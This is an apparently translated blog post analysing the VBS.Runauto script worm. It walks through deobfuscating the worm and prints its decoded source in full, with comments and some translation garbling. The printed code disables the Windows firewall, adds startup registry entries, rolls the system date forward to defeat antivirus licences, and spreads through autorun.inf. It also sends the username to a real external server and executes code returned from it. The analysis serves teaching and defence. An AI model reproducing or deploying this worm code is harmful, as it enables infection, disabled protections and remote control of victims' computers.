VBS.Runauto script virus analysis

Source: Internet
Author: User
Tags ultraedit

Recently, a colleague's notebook was infected with this virus. Since I am teaching VBScript to computer students this semester, I took the opportunity to analyze it.
First, the virus sample was extracted from the infected computer. The sample was found by chance and was not specially prepared; it was compressed and saved with WinRAR.
I opened the compressed file of the virus sample on the lab machine. My Symantec 11 immediately raised an alarm and deleted the virus. For virus analysis, therefore, the anti-virus software must be disabled or an "exception area" must be set. I created an "evA" folder on the desktop and set it as an anti-virus exception folder, and the virus sample now lies quietly inside.
A script virus is an interpreted program, so no special decompilation tool is needed to view the source code. Windows Notepad is enough, but I still prefer UltraEdit.
Use UltraEdit to open the virus file, as shown in Figure 1. Note that to avoid triggering the virus by accident, first change the .vbs extension to .txt.

Figure 1 virus script
When you open the virus script, you find that the code is hard to read: uppercase and lowercase letters are mixed at random, and there are many symbols that make no sense. In fact, this is the "umbrella" the virus uses to protect itself.
The mixed case is easy to deal with: select the text in UE (UltraEdit for short) and convert it to lowercase with Ctrl+F5. The cipher-like "00c2% 0033% ......" strings are more troublesome.
From the virus code, we can see that the "STrREVeRSE" and "unEscaPE" functions are called wherever there is "garbled code". Of these, unescape is a standard VBScript function that decodes strings encoded by the escape function. By way of explanation: some symbols, such as "<" and ">", are reserved in HTML on the Web, so to display them you need to encode them. All spaces, punctuation marks, accented characters, and other non-ASCII characters are replaced by a %xx encoding, where xx is the hexadecimal value of the character; for example, a space is encoded as "%20". Characters with a value greater than 255, such as Chinese characters, are stored in %uxxxx format. Analyzing the "cipher", we find that the escape-encoded string is stored reversed. Together with the "STrREVeRSE" function name, we can conclude that, to keep antivirus software from detecting the virus, the author encoded the key code and stored it in reverse.
In UE, strings can be encoded and decoded directly, but there is no ready-made tool for reversing a string. As I have recently been teaching JavaScript to students, here is a page for decoding or encoding; the code is as follows:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Reverse the string</title>
<script type="text/javascript">
function _reverse()
{
  with (document) {
    if (rev.order.checked) {
      // Reverse first, then decode
      revedstr = rev.instr.value.split('').reverse().join('');
      write("<strong>reversed string: </strong>", revedstr, "<br/>");
      write("<strong>unescape string: </strong>", unescape(revedstr), "<br/>");
      write("<strong>escape string: </strong>", escape(revedstr), "<br/>");
    }
    else {
      // Decode first, then reverse
      unescapstr = unescape(rev.instr.value);
      revedstr = unescapstr.split('').reverse().join('');
      write("<strong>unescape string: </strong>", unescapstr, "<br/>");
      write("<strong>reversed string: </strong>", revedstr);
    }
  }
}
</script>
</head>
<body>
<form action="" method="post" name="rev">
<input name="order" type="checkbox" value=""/> conversion order (reverse first, then decode)? <br/>
<input name="instr" type="text" value="enter" onmousemove="this.select()"/>
<input name="" type="button" value="convert" onclick="_reverse()"/></form>
</body>
</html>
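
The same decoding can be applied statically to a whole script instead of one string at a time. The following is an added example, not part of the original article or of the virus; it assumes the obfuscated literals are wrapped as unescape(strreverse("...")) or strreverse(unescape("...")), and the sample input is constructed for illustration. It only rewrites text and never executes the script being analyzed.

```javascript
// Added example: static decoder for reversed, escape()-encoded VBScript literals.
// Assumption: literals are wrapped as unescape(strreverse("...")) or
// strreverse(unescape("...")). Nothing is executed; only text is rewritten.

// escape()-style decoding that tolerates randomised case ("%U0077", "%2e").
// The built-in unescape() only recognises a lowercase "%u".
function unescapeLoose(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (m, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

function reverse(s) {
  return s.split('').reverse().join('');
}

// Either nesting order, any letter case, VBScript "" quote escapes.
const WRAPPED =
  /(unescape|strreverse)\s*\(\s*(unescape|strreverse)\s*\(\s*"((?:[^"]|"")*)"\s*\)\s*\)/gi;

function deobfuscate(script) {
  const findings = [];
  const text = script.replace(WRAPPED, (call, outer, inner, literal) => {
    // Same function twice is not the pattern described; leave it alone.
    if (outer.toLowerCase() === inner.toLowerCase()) return call;
    const raw = literal.replace(/""/g, '"');
    // The inner function is applied to the literal first.
    const decoded = inner.toLowerCase() === 'strreverse'
      ? unescapeLoose(reverse(raw))
      : reverse(unescapeLoose(raw));
    findings.push({ encoded: literal, decoded });
    return '"' + decoded.replace(/"/g, '""') + '"';
  });
  return { text, findings };
}

// Constructed sample lines, not taken from the real virus body.
const SAMPLE = [
  'sEt wShShElL = cReAtEoBjEcT(uNeScApE(sTrReVeRsE("LlEhSe2%TpIrCs7700U%")))',
  'xMl.sEtReQuEsThEaDeR "user-agent", StRrEvErSe(UnEsCaPe("rav%65"))',
].join('\r\n');

const result = deobfuscate(SAMPLE);
for (const f of result.findings) console.log(f.encoded, '=>', f.decoded);
console.log(result.text);
```

Because VBScript is case-insensitive, lowercase the decoded strings before comparing them against known object or command names.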

The code after decoding with the above tool is as follows:
On Error Resume Next
Set fso = CreateObject ("scripting. filesystemobject ")
Set wshshell = CreateObject (strreverse ("wscript. shell "))
Dim dri_list, dri_list0
Dim issend
Issend = 0
C_time = Date ()

'This is to disable SharedAccess (Internet Connection Sharing and Firewall Service).
Wshshell. run "net stop sharedaccess", 0

Set drvs = fso. drives
Sysdir = fso. GetSpecialFolder (1) 'windowsfolder = 0, SystemFolder = 1, TemporaryFolder = 2
Thispath = wscript. ScriptFullName
Set fc = fso. OpenTextFile (thispath, 1) 'forreading = 1, ForWriting = 2, ForAppending = 8
Scopy = fc. readall
Fc. Close
Set fc = Nothing
'Write the Registry registration file sysinfo. reg. The registration system automatically runs the virus upon startup.
Call writefile (sysdir & "\ sysinfo. reg ", "windows registry editor version 5.00 [hkey_local_machine \ software \ policies \ microsoft \ windows \ system \ scripts \ startup \ 0 \ 0]" script "=" % windir % \ system32 \\ prncfg. vbs "" parameters "=" "exectime" = hex (B):, 00, 00,00 [hkey_local_machine \ software \ microsoft \ windows \ currentversion \ group policy \ state \ machine \ scripts \ startup \ 0 \ 0] "script" = "% windir % \ system32 \\ prncfg. vbs "" parameters "=" "exectime" = hex (B):, 00
")
'Import the Registry sysinfo. reg
Wshshell. run "regedit/s sysinfo. reg", 0
Wscript. sleep 200
Fso. deletefile sysdir & "\ sysinfo. reg", True

'If the script currently running is in the system directory
If InStr (thispath, sysdir)> 0 Then
Dri_list0 = listdrv ()
O_time = left (c_time, 3) & cstr (Int (Mid (c_time, 4, 1)-1) & Right (c_time, Len (c_time)-4) 'set the date back 1 year
Wshshell. run "cmd/c Date" & o_time, 0
Wscript. sleep 10000
For dri_ I = 1 to Len (dri_list0)
Call writeauto (Mid (dri_list0, dri_ I, 1 )&":\")
Next
Wshshell. run "cmd/c Date" & c_time, 0

'Wmi application query computer name, user name
Computername = "": username = ""
Set ob1_miservice = GetObject ("winmgmts: {impersonationlevel = impersonate }! \. \ Root \ cimv2 ")
Set colcomputers = obw.miservice.exe cquery ("select * from win32_computersystem ")
For Each objcomputer in colcomputers
Computername = objcomputer. name
Username = objcomputer. username
Next
If username = "" Then username = "evar"
If InStr (username, "\") <= 0 Then
Username = computername & "\" & username
End If
Do
If issend = 0 Then
'Link to the Internet to get the code to be executed
Set xml = CreateObject ("msxml2.serverxmlhttp ")
Xml. open "get", "http: // 202.119.104.100/zzb/eva/count. asp? A = "& username, 0
'Http: // 202.119.104.100/zzb/
Xml. setrequestheader "user-agent", "evar"
Xml. send ()
If Err. number = 0 Then
Issend = 1
Res = xml. responsetext
If ucase (left (res, 7) = ucase ("Execute") Then Execute res
Else
Err. clear
End If
Set xml = Nothing
End If

Dri_list = listdrv ()
For dri_k = 1 to Len (dri_list)
If InStr (dri_list0, Mid (dri_list, dri_k, 1) <= 0 Then
Call writeauto (Mid (dri_list, dri_k, 1 )&":\")
End If
Next
Dri_list0 = dri_list
Wscript. sleep 1000
Loop
Else
Wshshell. run "explorer. \", 3
Wscript. sleep 2000
Wshshell. appactivate LCase ("My Computer ")
Wshshell. sendkeys UCase ("% c") 'simulate the press Key alt + space + c, which is actually to close the window
Runflag = 0

'Obtain the current system process, WMI Application
For each ps in GetObject _
("Winmgmts: \. \ root \ cimv2: win32_process"). instances _
If lcase (ps. name) = lcase ("wscript.exe") Then
Runflag = runflag + 1
End If
Next
If runflag> = 2 Then wscript. quit
Set sf = fso. GetFolder (sysdir)
F_time = Left (sf. datecreated, InStr (sf. datecreated, "")-1)
Wshshell. run "cmd/c Date" & f_time, 0
Wscript. sleep 100
Call writefile (sysdir & lcase ("\ prncfg. vbs"), vs (scopy ))
Wshshell. run "cmd/c Date" & c_time, 0
Wshshell. run sysdir & "\ prncfg. vbs"
End If

'Confusing string for code variations!
Function vs (str)
Execute "For I = 1 to Len (str) c = ucase (Mid (str, I, 1) randomize If Int (rnd () * 100)> 50 Then vs = vs & lcase (c) Else vs = vs & c End If Next vs = replace (vs, ucase ("% u "), lcase ("% u "))"
End Function

'List drives
Function listdrv ()
Execute "Dim tmp_list =" "For each drv in drvs If drv. isready Then tmp_list = tmp_list & drv. driveletter End If Next listdrv = tmp_list"
End Function

'Write the autorun. inf file
Sub writeauto (path)
'Preparations before writing the Auto file. If the path contains the autorun. inf folder, rename it. If the path contains the autorun. inf file, delete it.
Execute "If fso. folderexists (path & "autorun. inf ") Then fso. movefolder path & "autorun. inf ", path & rnd () elseif fso. fileexists (path & "autorun. inf ") Then fso. deletefile path & "autorun. inf ", true End If"
'Launch code in autorun. inf
Repeated STR = "shell \ * \ commandpolicwscript.exe" & chr (34) & "eva. vbs" & chr (34)
Autostr = "[autorun]" & vbcrlf & "open =" & vbcrlf & replace (reverse STR, "*", "open") & vbcrlf & replace (reverse STR ,"*", "Lead e") & vbcrlf & replace (reverse STR, "*", "find ")
'Write
Call writefile (path & ucase ("autorun. inf"), autostr)
Call writefile (path & "eva. vbs", vs (scopy ))
End Sub
'Write content to fpath and set the file attributes to ReadOnly, Hidden, and System.
Sub writefile (fpath, content)
Execute "If fso. fileexists (fpath) Then fso. deletefile fpath, true Set fc = fso. openTextFile (fpath, 2, true) fc. write content fc. close Set fc = Nothing Set fa = fso. getfile (fpath) fa. attributes = 7 Set fa = Nothing"
End Sub

I have added many comments to the code above; if you have read this far, you probably understand it. The coding quality is average, and because the code downloads virus commands from a website at Nanjing Normal University, the author is presumably a student.
In this virus, the author uses a custom vs function to "change faces": it randomly converts the case of the virus body to avoid anti-virus detection. In practice, this kind of processing has no effect on real anti-virus software.
The technologies used in this virus, such as the registry, Windows autorun, file operations, and WMI control, are all mainstream technologies in the current Windows environment. It shows that Microsoft provides call interfaces for scripts, especially VBScript. Technically, COM components provide Automation interfaces that support calls from various scripts. This was originally intended to let Windows scripts do more, but it serves viruses just as "well". The main purpose of virus analysis here is therefore not to write viruses but to learn programming techniques and use them to help our work and study. If you want to learn script programming, this example is worth analyzing.
So far I have not gone into the virus in detail. Although I always think the code is the best explanation, I should still do justice to the word "analysis" in the title.
This virus relies mainly on the Windows Autorun.inf mechanism to run. A virus must be run, directly or indirectly. When an "ignorant user" double-clicks a USB flash drive carrying the virus, Autorun.inf starts the eva.vbs virus. The virus first stops the "SharedAccess" service to disable the firewall that comes with Windows, mainly in preparation for communicating with external websites.
After the firewall is disabled, the script writes a registry file and imports it into the system so that the virus starts at boot; this is also a common feature of viruses. After the program starts, it has to work out whether the virus is already running. Windows WMI provides a large number of interfaces for scripts to access system functions; here it is used to detect whether there are multiple virus processes in the system, and if so, the script exits. The main function of this virus is replication, which is also why it is classified as a worm, but one feature interests me very much: this virus executes commands sent from the server.
In this virus, the ServerXMLHTTP component is used to communicate with the server. This technology is actually the basis of the popular AJAX technology. Communicating with the server and executing code downloaded from it reflects the author's hope of controlling "bots" over the long term. What I cannot understand is that the code detects the account of the current computer user and sends that user information to the server. Many operating systems in China are pirated, and most of those popular in this period are modified editions of Windows such as "Tomato Garden". Such editions have one thing in common: the installed system uses their "brand" as the user name. For example, in the "Tomato Garden" edition of Windows, the default user is "tomato garden". Judging from this code, is the virus conducting a "census of pirated copies" of Windows?
The last thing to mention is the virus's modification of the system time. Modifying the system time is often fatal to anti-virus software. Ironically, the virus only shifts the time forward by one year, and that is enough to invalidate the license period of many anti-virus products. It is like the way setting the wrong time on Windows XP when it was first released could crash the system: a wrong time often destroys a seemingly solid system. In this way, Kaspersky's license period becomes invalid, the anti-virus engine is then suspended, and a student virus of no technical difficulty is able to spread. Isn't that ironic for anti-virus vendors? To protect their own interests (time-limited licensing), they put users at risk of virus attacks. In fact, some anti-virus vendors have noticed this problem: when the license expires, they should not shut down the scanning and removal engine; at most they can stop virus definition updates. In addition, the most effective way for this virus to modify the time is to adjust it forward rather than backward, because you do not know whether different users' anti-virus licenses run for one year or n years, but you can be certain of this: adjusting the time forward by one year may seem normal to a person, but it is hard for a computer to make sense of.
The above is a simple analysis of the virus; I mainly talked about the parts that interest me. Next, let's talk about virus protection. Some time ago, I attended a Symantec product conference in Nanjing, where a salesperson introducing their products said: "No one lets their computer run naked nowadays!!!" I believe many friends know that "running naked" means a computer with no anti-virus software installed. In fact, this salesperson is wrong. I "ran naked" for more than a year, and the system never had any problems. This is not just my own claim: I installed a certain brand of anti-virus software to scan, and it found no virus. The reason I installed it at all was to test that brand of anti-virus software, and afterwards I was too lazy to remove it.
Many friends will say that I really am a "god man". My answer is that I am no "god"; you can do it too. The key is whether you actually do it!
From the whole process of running the virus, we can see that basically all the key operations can succeed only at the system administrator level: for example, modifying the time, enumerating system processes, and reading and writing the registry. If your computer account is only a normal User, I think this virus will be powerless against you.
In addition, because I like to analyze the behavior of viruses, I have also picked up some tips for "escaping" them. I analyzed the "Happy Time" script virus many years ago. At that time, I was not very familiar with VBS scripts. You could say that virus gave me a better understanding of what VBS scripts can do, and it inspired me to use scripts to solve problems in my work!

Appendix: Symantec's information on the virus
Discovered: March 12, 2007
Updated: March 12, 2007 5:17:48
Type: Worm
Infection Length: 1,112 bytes
Systems Affected: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows 2000
VBS.Runauto is a Visual Basic script worm that copies itself in the root folder of all drives (including removable devices) except floppy drives.
Protection
Initial Rapid Release version: March 13, 2007
Latest Rapid Release version: September 17, 2008 revision 038
Initial Daily Certified version: March 13, 2007
Latest Daily Certified version: September 17, 2008 revision 039
Initial Weekly Certified release date: March 14, 2007
Threat Assessment
Wild
Wild Level: Low
Number of Infections: 0-49
Number of Sites: 0-2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Low
Payload: Copies itself to all drives on the compromised computer.
Distribution
Distribution Level: Low
Writeup By: Mircea Ciubotariu
